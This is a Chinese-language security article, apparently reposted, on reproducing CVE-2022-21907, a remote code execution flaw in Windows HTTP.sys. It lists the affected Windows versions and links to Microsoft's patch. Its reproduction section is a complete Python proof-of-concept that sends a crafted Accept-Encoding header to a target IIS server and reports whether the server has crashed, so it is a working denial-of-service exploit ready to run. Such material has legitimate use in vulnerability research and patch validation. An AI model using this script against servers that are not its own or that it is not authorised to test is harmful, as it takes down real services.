HTTP協議棧遠程代碼執行漏洞(CVE-2022-21907)復現
VSole2022-01-25 07:31:03
文章來源:洛米唯熊
0x00 漏洞概述
HTTP協議堆棧中存在遠程代碼執行漏洞,由于HTTP協議棧(HTTP.sys)中的HTTP Trailer Support功能存在邊界錯誤可導致緩沖區溢出。
未經身份驗證的攻擊者通過向Web服務器發送特制的HTTP數據包,觸發緩沖區溢出,從而在目標系統上執行任意代碼。該漏洞被微軟提示為“可蠕蟲化”,無需用戶交互,便可通過網絡進行自我傳播。
CVSS評分為9.8
0x01 影響范圍
Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems
0x02 漏洞復現
#!/usr/bin/env python3# -*- coding: utf-8 -*-# File name : CVE-2022-21907_http.sys_crash.py# Author : Podalirius (@podalirius_)# Date created : 13 Jan 2022
import argparseimport datetimeimport requestsimport timeimport threading
def parseArgs(): parser = argparse.ArgumentParser(description="Description message") parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.') parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)') return parser.parse_args()
def monitor_thread(target, dtime=5): print('[>] Started monitoring of target server for the next %d seconds.' % dtime) for k in range(dtime): try: r = requests.get(target, timeout=1) except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e: print(" [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")) else: print(" [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")) time.sleep(1)
if __name__ == '__main__': options = parseArgs()
if not options.target.startswith('http://') and not options.target.startswith('https://'): target = "http://" + options.target else: target = options.target
payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
# Starting monitoring thread t = threading.Thread(target=monitor_thread, args=(target,)) t.start() time.sleep(2)
# Sending payload print(" [+] Sending payload ...") try: r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15) except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e: t.join() print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
# Cleanup t.join()
0x03 修復方案
官方已發布受影響版本的對應補丁,建議受影響的用戶及時更新官方的安全補丁。鏈接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
VSole
網絡安全專家